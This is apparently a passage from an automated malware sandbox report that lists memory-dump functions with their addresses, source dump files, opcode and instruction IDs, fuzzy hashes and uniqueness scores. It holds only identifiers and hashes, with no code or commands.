                            • Instruction Fuzzy Hash: FFF0DA71E101199F8B44DFAEC8058DEBBF5EF8C610B10456AD509E7320E7709901CBE0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 07968768, Relevance: .0, Instructions: 27COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000E.00000002.976017692.0000000007960000.00000040.00000001.sdmp, Offset: 07960000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 14db40454cf15201ccfc402b98cee2b98c5f9194fffb1909b9bb264758c232b6
                            • Instruction ID: cccfee4bc141b9349e6f542db14bfbc106b7966d9e40bd3856af6ca18fa40076
                            • Opcode Fuzzy Hash: 14db40454cf15201ccfc402b98cee2b98c5f9194fffb1909b9bb264758c232b6
                            • Instruction Fuzzy Hash: DFE01BB6E04114AFDB14DA9AE41869E77FED788261F04817BD119D3340DA345544CF54
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 074385D8, Relevance: .0, Instructions: 27COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000E.00000002.975120740.0000000007430000.00000040.00000001.sdmp, Offset: 07430000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d213d327ba271a56abef5a7217c68ddbed4bcffded6e2c0239e5febc180f1d82
                            • Instruction ID: e59f97d4726149d91ee4ca25e54866f2add8fe1b83e6b57124cbc128aa77de93
                            • Opcode Fuzzy Hash: d213d327ba271a56abef5a7217c68ddbed4bcffded6e2c0239e5febc180f1d82
                            • Instruction Fuzzy Hash: F1E04F363011147FD7149A66AC48AA7BF9FEBC52B0B058176E948C7215DE71981286B0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 07968808, Relevance: .0, Instructions: 26COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000E.00000002.976017692.0000000007960000.00000040.00000001.sdmp, Offset: 07960000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 465ed674eb3f7053d529d9721192b411c606490cb5ad17e1cad4e16a5d9d566a
                            • Instruction ID: f06d0795dcdd877d1301f393f41cfad703ba71fe2110cae05283e06da9cd295e
                            • Opcode Fuzzy Hash: 465ed674eb3f7053d529d9721192b411c606490cb5ad17e1cad4e16a5d9d566a
                            • Instruction Fuzzy Hash: 19E0DF3234E7C09FD70713B468A44BABFA5DECB16C30A00EEC4DA8F282EA211147C701
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 07967128, Relevance: .0, Instructions: 23COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000E.00000002.976017692.0000000007960000.00000040.00000001.sdmp, Offset: 07960000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1838afc2709cc877e58abe9056085e11071d17259e15235d4578f8ef705774cb
                            • Instruction ID: 3d99766cd06fce385128b0c8b7d02581c92b1bb2aee53ddab97fd26d5d0c2c74
                            • Opcode Fuzzy Hash: 1838afc2709cc877e58abe9056085e11071d17259e15235d4578f8ef705774cb
                            • Instruction Fuzzy Hash: 5CE020F0720A145BC664FA70CB449AA7399FF4161CF801D1EC50647F40EF60B9184BA6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0796778F, Relevance: .0, Instructions: 20COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000E.00000002.976017692.0000000007960000.00000040.00000001.sdmp, Offset: 07960000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 945bdc69d68830c61d08806a34d601262b3d2abf298f24eeb80b5283734c1fe8
                            • Instruction ID: b72e265c74c4898a1027de7f8a740ab4b9a29b59d3398b3a8863bdf142759ccd
                            • Opcode Fuzzy Hash: 945bdc69d68830c61d08806a34d601262b3d2abf298f24eeb80b5283734c1fe8
                            • Instruction Fuzzy Hash: 85E0467261838A8FCB41CFA0F8498CA7BB0EF52314B1148A7E45087562D3309924CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Non-executed Functions